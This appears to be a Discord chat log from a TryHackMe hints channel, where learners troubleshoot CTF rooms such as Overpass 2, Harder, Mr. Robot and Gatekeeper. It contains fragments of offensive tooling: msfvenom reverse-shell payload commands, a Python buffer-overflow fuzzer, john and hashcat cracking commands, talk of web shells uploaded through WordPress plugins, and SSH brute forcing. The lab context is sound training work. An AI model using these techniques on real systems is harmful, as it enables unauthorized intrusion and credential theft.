@agile whale In the image

hmmm OK

is it first.txt or second.txt

were are you stuck?

James are if you are referring to the string with that "!" and the password required to extract it that I already found that.

Yea

zero width in that file

then #resources

@agile whale the last flag is hidden in an image

yep I just found it

For intro to x86 task 7 question 1 . I have tried to analyze what the binary does with the password i only noticed thst extra bytes are added .

ok I give up ... but thank you for your help ☹️

I didn't open the extracted file with a hex editor so didn't notice the extra data

at the time

I didn't open the extracted file with a hex editor so didn't notice the extra data
@agile whale I have plugins for it, and I think my text editor picked up on it

@white salmon sometimes taking some rest and starting a new is good

I would have just cat the file at the time, didn't know cat supported unicode

@heavy anvil certainly ... it's just that it's annoying to leave an incomplete room

I would have just cat the file at the time, didn't know cat supported unicode
@agile whale Probably depends on your terminal

hints on anonymous playground?

ive been trying the harder boxes but they seem to be very difficult

Where are you stuck?

It's still new so hints will be sparse

hey everyone

im at smaggrotto and i have a trouble

What's up?

i was trying to get in ||development.smag.thm/login.php|| and im not getting a response

i'd edit my hosts file

but nothing. I tried editing it a couples of times and copy-pasting the address

What's in your hosts file?

but no luck

Reg :Tartarus , injecting !/bin/sh in the git privilege escalation, throwing !/bin/sh: not found error. Any one encountered this? Can anyone guide me ?

You need the virtual host in there too

Reg :Tartarus , injecting !/bin/sh in the git privilege escalation, throwing !/bin/sh: not found error. Any one encountered this? Can anyone guide me ?
@jagged musk it’s called a shebang

Cuz the syntax is #!

trying now.

So development.smag.thm is a subdomain of smag.thm. Using DNS, they can resolve to a different IP address or the same IP address. Your hosts file needs the subdomain, in order to make development.smag.thm actually resolve to the right IP @grand pivot

oh right

i forgot it

thanks

@jagged musk it’s called a shebang
@oblique cliff Thanks Sir Blob!

Might be too early to ask for a nudge on harder, but I've found the ||php files|| on the ||pwd domain||, but I've got no clue where to go from here

What parameter allows us to generate a POC(actual exploit) in xsrfprobe ?

Might be too early to ask for a nudge on harder, but I've found the ||php files|| on the ||pwd domain||, but I've got no clue where to go from here
@burnt cosmos
Just read the source code of the files and try to bypass the security functions

hi guys i need pointer for room harder....stuck at enumerating use gobuster, nikto but didnt find anything ! to get in

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@boreal wren

As mentioned in the description. Closely take a look at every request. Love the instant rule 13 messages xD

👍

can someone tell me how to get password from that cipher text in anonymous playground room

Try ciphey

Also, do not ask questions about new rooms, please

i dont think it is new room

past 4 days from launch of the room

I can tell you Ciphey won't get it

Most likely

I haven't done the box so take my words with a grain of salt but cyberchef is always a shout

Seeking a hint. I'm working on The Cod Caper - Task 5 - #3. Searched all files owned by pingu, no password found. Private key requires password. Am I missing something? Thanks

Don't know how much of a hint you need but if the private key needs a password I'd look into ssh2john @green merlin

It won't be on Cyberchef either

Jus sayin

Is the "harder" foothold a result of data mining/discovery, or an enumeration attack, or somethign else entirely

i've got the daemon versions, a list of users, a vhostname, a slew of useless cve's for said services.. I'm not sure if i'm supposed to tackle daemons, or try to brute force users .. but dont want an outright answer yet

harder is a new room, so I can only say: read the hints in the description carefully

Looking for a hint on: Set. I have a list of users, but not sure what to do with them except to brute force passwords, which does not seem correct.

Can i ask about harder?

I get stucked

the room is only 1 day old. no hints or help yet

It's okay

anyone did the anonymous_v3 ?

@gilded pasture https://github.com/magnumripper/JohnTheRipper/issues/2125

It's not a challenge box so

It's easier with hashcat IMO

trying with john

Then that link should help

yep, checked, but i'm having problems with rockyou

It's in there, just fine

yep, but it's not working

john is not letting me use that

make sure you're using --wordlist=/usr/share/rockyou.txt

you need --wordlist=

John is fussy

.

pg13

wtf it's stopping immediatly

sorry

DM me the contents of your hash file

I can confirm it will crack almost immediately tho

Geez I hope I m not just super blind but even with the hint I cant find the answer.. Completed the hole room except this one question..
Room: rpburpsuite
Would be great if someone could give me a hint

I just did that

Further up the task, it mentions uses for comparer and how we can use it

What might be different for different users?

ugh I got it
thank you very much!

solved so much stuff before but failed at that ;D

No problem. Glad you got it!

Should i be using metasploit on easy ctf?

and I should be attacking the web server first righttt?

I get stucked
@white salmon

Harder has a community write-up. The hints should be fine...it's all about enumeration.

Thanks but i found some weird things

And where is?

Writeups are on the room page.

Told us about the weird things

But i will try more

before read the writeup

Checkout the "known issues" for this room too

who made the known issues

he says .htb and we are in tryhackme lmao

Harder was a rejected HackTheBox challenge box

The machine contains breadcrumbs with htb TLD...bc it was rejected on htb. I will fix this later

Ok i see

The room is realistic

The hackthebox team was not able to deploy the target Linux distro...the content was fine.

But the diffculty isn't medium, it's hard

It was set to hard by me before releasing...the thm team decided to go medium

lol

daily budge is easier than harder

and daily is harder

Not my decision making

Yes i know

Doesn't matter, the important is the room

some thm hard boxes are actually medium ones but this one is defo a medium one imo

Hi, anybody did here the https://tryhackme.com/room/malresearching room? I am stuck with Task4 Question2 (all the other questions have been solved), I have tested many answers and none of them worked. I don't know if it is a problem I have with the content or with the language (I am not native speaker)

some thm hard boxes are actually medium ones but this one is defo a medium one imo
@wooden mist
Depends on your knowledge base...

I would like to have a small hint to knock this room

yes it does, but this really wasn't a hard one imho

Hey lads

im currently on the ToolsRus room

and am having a problem with the final part, the Metasploit section

Wrong LHOST

I've taken a look at a guide and it's meant to connect to the session, any idea what I might be doing wrong?

Wrong. LHOST.

Can you show options?

It's just a wrong lhost!

really? what is it meant to be?

your VPN IP

ah

Your LHOST needs your match your tun0 IP

You have it set to a virtualbox NAT IP

alright, I get it

The target can't talk to that

which one should I use?

None of those

Your VPN needs to be running in Kali

hm?

Not in Windows

oh

really? I'm using a VM though

and I can enter into the site

VPN runs in the VM

There's an explanation pinned in #room-help

But run it in the VM

Grab your tun0 IP by throwing ip address into Terminal

ip a s tun0

says "tun0" doesn't exist

😦

Yes

Because you need to run the VPN in Kali

alright, let me try, thanks for the advice Ninja. 😻

We told you that. So it's not going to work until you fix that 😉

😉

still no luck

I checked the fields and they're all correct

and "ip a s tun0" now works

It's telling you something else is wrong

So check your ports and passwords

any idea what it might be? cause everything here looks correct to me

So check your ports and passwords
@stuck fractal

isn't 1234 correct?

I don't know. Check it.

yep, it's correct

hmmm

🤔

what is the lport for?

Google it

metasploit what is lport

doing that as we speak

hi everyone

im getting problems trying to get a meterpreter shell with a room

/hackpark

Haha. Ha. Ha. Hackpark

I'm not surprised tbh

How did you generate your shell?

its just dying

with msfvenom

What payload did you generate?

||windows/x64/meterpreter/reverse_tcp||

show options in your multi handler and paste a screenshot please

Change the payload in multi handler to the same payload that you generated

and maybe try an unstaged payload if that doesn't work

Change the payload in multi handler to the same payload that you generated
@stuck fractal there it is!!!

hey, do you think it might be something with my wifi that's causing my metasploit to not work?

sometimes i get stuck with just stupid things

is that maybe possible?

😟

@wind fog No. Because the VPN eliminates that.

thank you for your patience

It's something that's got me before

alright, I shall keep on investigating 🕵️

Run the VPN troubleshooting script

oh, it has one?

let me find it

#bot-commands !vpnscript

Ei lads

I'm back again

Reboot your VM

Make sure the VPN isn't running in Windows

Not in that order

alright

holy fek! Yes, it finally worked! Only took 4 hours

thanks for the advice Ninja

you da best 😉

Heeyy you got it. Good on you. 🙂

Exploiting Telnet. I have my Kali Machine with Vpn, telnet is ok, i can sniff traffic, on my local machine i execute: msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R

In the telnet session i execute .RUN the result of msfvenom, but nothing happens.

i need help to cracking password in overpass2 can some one help me ??

||$ echo '$6$7GS5e.yv$HqIH5MthpGWpczr3................................GX.5PyMpzAYo3Cg/' > hash.hash
$ sudo john -w=rockyou.txt hash.hash
[sudo] password for secret:
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status||
it wont be crack will it need much time to crack??

can playing fair could be a hint of anonymous ? lol, i am not asking for hints, but just confirming one.

@lucid crescent it should crack very quickly.. check you have the right format? and I always use --wordlist=/..... as JTR is fussy on this ... https://github.com/magnumripper/JohnTheRipper/issues/2125

ok @oblique shuttle

@lucid crescent also make sure that you are adding salt with the password. It should be cracked in max min or so.

ok

hashcat might be easier @lucid crescent, with the salt it cracks in just a minute or less

any good hint out on anonynous playground initial foothold ? i am out of ideas on decipher the lowercaseUppercase string.

check the names on the first page

check the usernames
@woven mirage for me ?

@woven mirage for me ?
@keen willow yes

Trying to solve overpass 2 and got stuck for 2 hours on the Task 1 last question to crack hash. I have found the hashes and pretty sure what mode i have to use with hashcat but dont know why it is not working
can anyone help?

hashcat might be easier @lucid crescent, with the salt it cracks in just a minute or less
@median compass a peoblem with hashcat is my GPU

im not using GPU in my linux

so hashcat wont work

Trying to solve overpass 2 and got stuck for 2 hours on the Task 1 last question to crack hash. I have found the hashes and pretty sure what mode i have to use with hashcat but dont know why it is not working
can anyone help?
@steady elm are you putting the salt in the hash?

yes, but it doesn't have to check a lot, i ran it in the VM not on my host and it cracked just fine

i.e. no GPU

ok maybe i will install graphic driver

@steady elm are you putting the salt in the hash?
@woven mirage hashcat i am using 1710 and this is the hash $6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: I get token length exception error

i.e. no GPU
@median compass hashcat is using GPU if u run it on ur own OS it wont work, else if u run it on ur vm it will work because ur vm has GPU and dont need driver

@median compass hashcat is using GPU if u run it on ur own OS it wont work, else if u run it on ur vm it will work because ur vm has GPU and dont need driver
@lucid crescent Pretty sure it will run on CPU too - https://hashcat.net/forum/thread-8269.html

not sure but as i know it need GPU

@steady elm I don't recognise the hash you're trying to break there, that could be the problem

i dont use hashcat really much

This is what I get when I run hashcat -I on my VM, no GPU to be seen
`
kali@dense merlin:~/Documents/TryHackMe/LookingGlass$ hashcat -I
hashcat (v6.0.0) starting...

OpenCL Info:

OpenCL Platform ID #1
Vendor..: The pocl project
Name....: Portable Computing Language
Version.: OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG

Backend Device ID #1
Type...........: CPU
Vendor.ID......: 1
Vendor.........: AuthenticAMD
Name...........: pthread-AMD Ryzen 7 2700X Eight-Core Processor
Version........: OpenCL 1.2 pocl HSTR: pthread-x86_64-pc-linux-gnu-znver1
Processor(s)...: 8
Clock..........: 3700
Memory.Total...: 10179 MB (limited to 4096 MB allocatable in one block)
Memory.Free....: 10115 MB
OpenCL.Version.: OpenCL C 1.2 pocl
Driver.Version.: 1.5
`

anyway, doesn't matter I guess, if it doesn't work for you it doesn't work! 🙂

@woven mirage hashcat i am using 1710 and this is the hash $6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: I get token length exception error
@steady elm ah sorry, i though you were speaking about another question

not all hashes you will be able to break

the question asks how many you can break

and also the hash is not that long

:18464:0:99999:7::: this isn't a part of the hash

@keen willow yes
@woven mirage shall i consider it to the reply of my msg (i.e. decipher lowercaseUppercase), or a brand new hint ?

a reply to the message

you know how one character is decoded

try to guess wich word could be made from the characters you know and then find a logic to discover the rest

I'm just glad people figured it out lol

Hi, may i have some question about box HaskHell?

I try to upload the reverse shell in directory ||submit|| however I got this error?

What format is your file

haskell file

.hs

Were you able to get the server to run any other Haskell files?

let me try

Can we ask hints for harder rn?

well the room has a writeup accepted doesnt it?

I believe you can @eternal brook

Don't wanna see the write-up now...

Oh ok

well the room has a writeup accepted doesnt it?
@woven mirage just clarifying that this message looks like i'm telling you to check the writeup, i meant to say that if it has a writeup accepted you can ask questions

Yeah I also saw that rn

It's a new room so I thought maybe like other rooms write-ups and questions will be closed for a while

can anyone tell me if i am doing something wrong

Room: Steel Mountain

Yes you did

You downloaded the web page rather than downloading the file @quiet yarrow

ohhhh ok

thanks james

So yeah I haven't got much out from the room I see lot of for that eventually look all the same || I just saw one kinda re direction to port 8080 /vendor || so re scanned the port is closed ran a script to scan all those dirs again but can't find anything useful...

Harder is the room

check the http requests

there is something on the requests that isnt being used by the website but gives useful info

Ohk alright thanks I'll check :)

Got it thanks termack :)

Just a question is that supposed to be real?

Like box says it's similar to real world pentest...

the creator of the box said it is

#522158404614225920 message

^

Anyone who could give me a hint for VulnVersity Recon?
Using the nmap flag -n what will it not resolve?

man nmap

In the time I read the manpage, the machine will go down 😅

Extend it.

ohhhhhhhhhhhhhhhhhhhhh

thanks Jabba

Hints on the Anonymous_v3 ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Also, that's the machine title rather than the room name

Use the room name or room code

Okey sure, i'm currently decrypting the cipher, i know the pattern used and i know the user involved.

can i pm you on looking-glass @lusty wigeon ? im at the final user. still enumerating

i don't wanna spam rule13 but lets just wait till the day end before hints

Found a box that seems to have a brute force (brute force on an SSH port with a known user). The next flag is a password of 7 characters so I'm assuming it will just be a weak creds within top 10k or something like that.

I can brute force every 7char password from the top 10million passwords, but any suggestions before I start off a big ol hydra brute force?

aa sure, i'll give myself somemore time to enumerate

So please slap me on the back of the hand if this question doesn't belong here. This isn't so much to get an answer as I don't quit get a comment made. In "HTTP Web Fundamentals @stuck fractal says, "you can tell I performed the request from (chrome version 80, from Windows 10)...

My issue is I do see that but I also see Mozilla, Safari etc... I think its supposed to be so obvious that I can't find info only to explain this but its going over my head.

@eternal timber Room?

@stuck fractal https://tryhackme.com/room/basicpentestingjt

It's the User Agent, it tells the server a bunch of stuff @real rock

@eternal timber Try some brute force them

In rockyou

Yeah I assumed as much

Just wanted to see if there was something I was missing before I just threw a brute force at it lol

@real rock So it's the bit that says Chrome 80

Yeah I see the User-Agent but the first thing I see after is Mozilla

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent

There's a breakdown of what each part means

Oh wow thank you Ninja

Mozilla docs are wonderful

I will do that one immediately

Ty, favorited the website

i am not able to overflow gatekeeper binary, while sending data by 'nc' it works well, but when i try to do it with python only sending works.

anyone willing to help, i can provide screenshots.

Sure screenshots

No one wants to help ? okay thanks.

@stuck fractal Yeah, rockyou got it pretty quick, also TIL rockyou has 2.5 million 7 character passwords in it

Typically for THM, brute force is meant to take under 5 minutes

Definitely with any newer boxes

Yeah, any challenges I make (outside of THM) I try to stray away from brute force due to the uncertantiy of it.

What about port scanning? @stuck fractal

Hey, that's not in the rule @oblique cliff

Your fault for not using threader or rustscan

I do use threader

Jokes on you

Be glad I didn't set it to 10k

Jokes double on you cuz I just don’t attempt your boxes until months after they’re out cuz I’m a dumb dumb

Sure screenshots
@oblique cliff this is when i use netcat.

i see bytes sent.

Show the commands you’re using not just the output

nc IP PORT

The python commands

`#!/usr/bin/python
import sys,socket,time
from time import sleep

buffer = "A" * 50

while True:
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(5)
s.connect(('IP_ADDR', 31337))
print "sending %s bytes \r\n" % str(len(buffer))
s.send(buffer)
s.recv(1024)
s.close()
buffer = buffer + ("A" * 50);
except Exception as e:
print e
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit()
time.sleep(1)
`

Screenshots are so much better 😱

no bytes sent.

whats the IP address youre using

and whats the output of the python script youre running

ip address is of my VM, that is correct, coz i can see output on immunity debugger. as gatekeeper is not sending response, so there is no output on python

Any help with Anonymous ?

you have to be more specific about what's giving you a hard time

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Anyone who could point me in the right direction with the second key of Mr. Robot CTF?
I don't really know where I could find ||White coloured font||

ip address is of my VM, that is correct, coz i can see output on immunity debugger. as gatekeeper is not sending response, so there is no output on python
@keen willow Are you running gatekeeper on your host OS, a VM, or THM

Anyone who could point me in the right direction with the second key of Mr. Robot CTF?
I don't really know where I could find ||White coloured font||
@hasty zodiac hey I’d be happy to, could you answer those question jabba just asked so I don’t repeat something you may have already tried?

Well, I can't without really spoiling how to get the first key.

Need a lil help with the || bOF of Anonymous Playground || , I was able to call the hidden function but || how do I get the shell because everytime I run the binary || , it just prints the message and exits with || Segmentation Fault ||

Blob just means what you have tried for the second key.

Spoiler text works fine

@keen willow Are you running gatekeeper on your host OS, a VM, or THM
@oblique cliff running gatekeeper and immunity debugger on VM and connecting it from kali (host)

@mint parcel

Blob just means what you have tried for the second key.
@trim haven you finally called me blob! 😍😍😭😭😭😭😭😱😭

Oh, it seems I have.

Well, checking through every command and page source.

@shut pollen ?

@keen willow can you dm me. A bit cluttered in here

And looked through the other file next to the one containing the first key

Did you directory bust?

oh shoot

Yep all good so far. Enumerate the possible subdirectories?

@mint parcel > you have to be more specific about what's giving you a hard time

Help with Anonymous ?

🙂

Forgot about that... thanks... I'll try that!

guess it's the ||wp-login||

Wouldn’t be a bad place to start

@shut pollen hmm.. i had the same problem... If i recall correctly,|| if you call the function address it just exit without getting a shell... try pointing it to the next instruction||

|| Instructions as in the c*****sh function ? ||

I don't feel like that's supposed to be part of the experience though, Blob.

You don’t think a Wordpress subdirectory that’s been set up on a purposely vulnerable box is part of the experience of pwning the box...?

Well, that indeed sounds foolish.

Haha

I promise it’s part of it 🙂

Just a quick thing.

I don't have to do wp-scan right?

Is that wp’s brute forcer tool?

finds vulns in WP

No

lets say in outdated versions, plugins, etc

You don’t need that

alright

ooo, found interesting stuff

I'm now at ||another key?||

@hasty zodiac you are going right way keep working in that direction

hmm

problem is the direction

you may have got the first key I assume?

yeah

wait

the other file

ya check that

hmm

dunno if I'm just dumb

youre not

the box isnt easy

what have you tried, what are you stuck on, etc?

||another key?|| | looked through the other file ||fsocity.dic|| using keywords

here is a hint for you
you won't get other two keys unless you get a shell on the target machine

there is no second key hidden in web pages

god damn it

you need to find your way in

||so basically upload a shell||

not sure how many CTFs you done, but wordpress usually requires credentials to get access and then upload a shell

work on getting the credentials 🙂

yeah I have access

I just didnt know I needed to get into the box

||I can just add a shell through plugins, right?||

yes

several ways to do it

just google wordpress reverse shell you'll find many articles on how to do it

imma just upload a b374k shell

@keen willow can you dm me. A bit cluttered in here
@oblique cliff thanks for help 👍

hello there person who found me.

youre welcome 🙂

Hi! I've found myself stucked at the beginning of the wgel ctf room. I bruteforced all the directories and I tried to find an exploit for the apache version running but It doesn't work. Any hint would be very appreciated 😋

Yeah, thanks. It was a misleading hint for the second key imo

indeed

now I just need to dig up the keys

Hi! I've found myself stucked at the beginning of the wgel ctf room. I bruteforced all the directories and I tried to find an exploit for the apache version running but It doesn't work. Any hint would be very appreciated 😋
@mossy ermine did you find anything when directory busting?

@mossy ermine did you find anything when directory busting?
@oblique cliff The most interesting things are || /sitemap || and || sitemap/images sitemap/sass /sitemap/fonts sitemap/js sitemap/css ||

The other results are html pages for a site template

try directory busting again on that interesting thing

you're also missing something when it comes to the apache page 🙂

Hey, I think I might have found an issue with one of the rooms. Can anyone confirm?

#site-bugs @tepid flame

preferably with screenshots and a detailed description of the issue

alright, thanks you.

damn, I do need privilege escalation 😦

yes.

2nd key done

🔥

3rd key was easier

the biggest struggle was the second key smh

thought it all had to do something with the webapp

@> you're also missing something when it comes to the apache page 🙂
@oblique cliff done. Got the || username || on || index.html || but I really don't find any other subdirs of || sitemap || . I tried all the directories lists that come pre-installed on kali linux

only got 90 points? others got 210

hmmmm are you sure you directory busted properly...?

you should definitely be finding something else

Oh > hmmmm are you sure you directory busted properly...?
@oblique cliff Wait, I realized only now that there's another directory on kali that contains dir lists. I'm going to check with them

honestly idk if I'm ready for another one

any good rooms?

@oblique cliff Lol, damn the || .ssh || directory

I'd do some walkthrough rooms tbh

huh?

walkthrough rooms

rooms that walk you through the tasks and steps

to help teach you

to inject knowledge into your brain

Eg new tools, new vulns

Well, I was asking for any rooms. Even walkthrough ones.
Specific ones.

Your dashboard has a few that are suggested

In order

Well, I'll go with metasploit then .

hey i'm doing crack the hash room using hashcat ...
and in one question i'm given with 1)hash , 2) salt, 3) rounds
is there any way i could use these 2 extra values to speed up the process ?

Hash = Thing you're cracking
Salt = Thing its encoded with
Rounds = https://security.stackexchange.com/questions/204813/what-are-sha-rounds

If you're cracking the hash without formatting the salt etc. you won't get an asnwer

ohkay , i'll try that

and any other way to crack the hash of $2y = bycrpt ?? i read that this one takes hell of a time ..

brypt hacking is pretty horrible

its designed to be costly (cpu wise)

It's possible

Use some logic and only try passwords with the correct length from rockyou

Also i remember people saying that if a BF takes longer than 10 mins (usually, re: THM rooms) you are doing it wrong... I tried 50k passwrods last night across 12 different accounts and couldn't crack this ssh .. so i think that i'm not supposed to brute force

so maybe you want to limit it to the top 100k lines of rockyou?

Just filter rockyou down to 4char passwords

system hungup lol

hi all.. trying a buffer overflow but cant overflow the buffer enough to write into eip instruction pointer... I can overwrite ebp basepointer but this get push when the programme tries to return. Anyone got any tips for overflowing to call a specific function address?

Room: https://tryhackme.com/room/jack
Part: User

I'm ||bruting wordpress with 3 users + rockyou.txt|| i still waiting +5min
PD: The tool is ||wpscan||

hi all.. trying a buffer overflow but cant overflow the buffer enough to write into eip instruction pointer... I can overwrite ebp basepointer but this get push when the programme tries to return. Anyone got any tips for overflowing to call a specific function address?
@oblique shuttle if you can overflow the ebp, you can probably get to the return address. What happens when you try to keep going?

i've tried a massive input (2000 chars) but nothing seems to touch the eip...

which room is this?

and if you overflow it too much the return address is going to point to a segmentation fault (i think), so you cant just way overshoot and expect your overflow to be in the return address

i've tried a massive input (2000 chars) but nothing seems to touch the eip...
@oblique shuttle run it with breakpoints in debugger? check for bad chars? jump to different address?

@oblique cliff anonymous

oh, i havent done that room so idk if he did something screwy with it

try jumping to a different address

It worked fine for me

You get segfault with ||80 chars||

@white salmon can i dm?

sure

@stuck fractal thx for the new room it's realy cool ^^

You're welcome

yes the foodhold part is really funny, now I am a bit stuck with the privesc :/

No hints yet.

I know. Im pretty sure that I am missing smh but I will root it ^^

yes the foodhold part is really funny, now I am a bit stuck with the privesc :/
@somber crag Dude same. I've been stuck on it since the day it came out lol. It's driving me a little up the wall. I feel like I'm making a simple mistake but don't know what.

Ditto

Okay, i've managed to secure what looks like a plaintext password and username, and hostname... I tried to ssh to the host, and the username and/or password dont jibe.

I added the hosts, and i'm trying to get in, and the server is pretending it does not exist.. like literally, that vhost does not work. I hit the wall

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

otoh, the url given divulges where the box came from

I'll be honest, there's a line between a hints chat and a "I'll talk to myself while working through the box" chat

This isn't that second part

Is there a person responsibel for creating the box, or adapting it to THM

(Harder)

Yes. The box has a creator

It was a rejected HTB box

I talk in TS, its not the right channel, no hints, no room help. i get it. asides from getting a pointer to Muir for typo correction. I do not know who posted it .. Its very excellent so far, but it has a critical flaw in its port

They're also here in the discord

If you read the channel topics, they describe exactly what the channels are meant for.

If you'd like hints, you'll have to actually ask

I am trying to solve Overpass and after starting backdoor it says started listening at but i am not able to connect to it using netcat. what am i missing?

Starting the backdoor?

This is overpass 1 or 2?

overpass 2

Starting the backdoor?
@trim haven i think we will use the backdoor to connect to the target

ssh -p 2222 <Machine IP>

so we basically cracked the intruder password and then used the same backdoor which he used to open port and connect to that port using ssh. But i dont know why i thought i could use netcat to connect to that machine port

Aha no

It’s an ssh backdoor

So you just ssh into it! 😄

Any hints for Overpass root flag? I checked all the basic stuffs i could for priv esc.

Overpass 1?

yes.

Have you ran linpeas on the machine?

You need to find out what you can and can’t control

Alright. I'll do that.

any hint for cracking salted password in overpass2

Did you check out github source code? See if it is pass+salt or salt+pass? Does hashcat have a mode for it ?

ok

but i think its password + salt @cyan token

Yup

so how do i crack password+salt i couldnt find it from google

I referred this https://robinverton.de/blog/2012/07/15/cracking-salted-md5-with-hashcat/

and this https://security.stackexchange.com/questions/204977/hashcat-cracking-a-salted-sha256

@cyan token thats hashcat

i said i want to crack it with john

Hi i had a doubt the new overpass2 box i have the user now

also i dont thing that hash is md5 @cyan token

yes it's not.

so ...

||i found a suid_bash file but to run it you need james password which is in pcap and i used that one and it didnt yield any results is it supposed to be like that||

@lucid crescent it is here in this one and you are correct

https://hashcat.net/wiki/doku.php?id=example_hashes

you can use some tool to figure what algo it is

and then look for that + salt mode in this and then use hashcat to crack it

||and if i am not wrong you can append the salt with : and also use jtr||

You don’t need any password to run the SUID file

huh

for me it prompts it

okay i will give it a go again

sudo -l

i cant run that without a password too

I’m 100% sure you don’t need a password for the SUID

i will give it a go

How are you running the file?

sudo file

i also tried the full path

Have you tried just

./binary

i will give that a go but i think i did and didnt get the shell as root

You’re not meant to

ohhh okaayy

You’re meant to abuse it for privesc

alrightty will give it a go thanks for the help

my problem in overpass2$ sudo john --format=sha256:salt --wordlist=ctf/rockyou.txt hashes.hash Unknown ciphertext format name requested

That’s not how you format

Usually

Also someone have you a hashes website for hashcat...?

I mean the error does tell you that the format name is incorrect

so how do i crack sha256 + salt in john

i would recommend going with hashcat

i need GPU for hashcat

You don’t

you dont

so tell me how to run it on CPU

Also everyone has a GPU so that’s not an excuse

it will be faster on a better GPU but that doesnt mean you cant run it

also you can downlaod hashcat on your main windows

and use that to crack stuff

it will be faster but with this one you wont even need to wait that long

Hi. I have a problem in scripting room. When I am trying to connect to the next port on server, it gives me the connection refused error. Tried to google this error and didn't find anything. Can u give some hints on what to check to solve this error?

so because i never used hashcat

can someone tell me how to do that

hashcat -m modenumber texthashesfile.txt rockyou.txt -O

you can remove the -O and add --force i think if i am not wrong

||-m sha256($pass.$salt)||

correct??

modenumber can be in the doku file i sent

nope

https://hashcat.net/wiki/doku.php?id=example_hashes

look for what you said here

whats the problem??

and get the number

Hash-Mode

||-m 110||

correct??

nope thats not what you are looking for in this case

thats for sha1

you need it for something else

hashcat (v5.1.0) starting...

* Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
No devices found/left.

Started: Tue Aug 18 11:15:32 2020
Stopped: Tue Aug 18 11:15:32 2020```

add --force at the end

and thats not the right mode

look for what hash you are cracking

and then find its hash-mode

||-m 1410||

i cant keep confirming i think

cause that would be kinda giving the answer

again its not correct if you get this

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 4096/13861 MB allocatable, 8MCU

Hashfile 'hash.hash' on line 1 ($6$7GS...VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/): Separator unmatched
No hashes loaded.

Started: Tue Aug 18 11:17:38 2020
Stopped: Tue Aug 18 11:17:38 2020```

whats the problem??

wrong mode and wrong algo

again research what algo you are cracking and look fro its appropriate hash mode

is this ||6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed||a right one??

Look at main.go in github. What algorithm is it ?

i dont remember that on the top of my head and again the hash and salt have to seperated with : and look for the right algo

it was ||sha512||

you got it?

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 4096/13861 MB allocatable, 8MCU

Hashfile 'hash.hash' on line 1 (bdd04d...7d8391dfc885d0e9b68acd01fc2170e3): Separator unmatched
No hashes loaded.

Started: Tue Aug 18 11:23:05 2020
Stopped: Tue Aug 18 11:23:05 2020```

no @brave bear

see the error

Separtor isnt there if i am not wrong

can someone give me a nudge on the dijinn room do i have to answer all 1000 question??

user or root?

and where are you?

what have you tried

@lucid crescent Show us the hash.hash file please

i cant get whats the problem i copy and paste the hash which wroten in main.go and found that was ||sha512|| and that is ||password + hash||

yeaah but you have to add a seperator

||bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3|| @trim haven

yup you dont have the separator for the password and hash

Where the hell is the salt

hash:salt

ohh yeaah that too hahah

you cant crack a password hashed with salt without the salt

No

You need to tell the tool where the salt is

I'm 90% sure the salt is there it's just not in the format

so can someone say what i need to do

i need to define salt??

find the salt

||hash:salt||

thats how it should be for cracking

||1c362db832f3f864c8c2fe05f2002a05|| here is the salt

so add it

in the format

adn then crack it

do i need to edit the hash.hash??

or define it in hashcat @brave bear

in hash.hash

ok

||$ cat hash.hash | grep 1c362db832f3f864c8c2fe05f2002a05|| found nothing in it

wut

Why are you doing that

Just edit the file

and put

ok

anyone

can someone give me a nudge on the dijinn room do i have to answer all 1000 question??

thisisthehash:thisisthesalt

@sinful plaza

user or root?
and where are you?
what have you tried

You gotta give some context first

which step are you at etc.

try answering the question but is taking to long

You gotta give some context first
@brave bear

whcih binary again

||i found this 14344392|| but it was incorrect

and what have you tried

Hey Guys. I would really appreciate any hint on the boiler ctf room. Until now I've enumerated the services and find some directories with dirbuster. I also have a sort of password (not sure) founded on || /joomla/_files/index.html ||
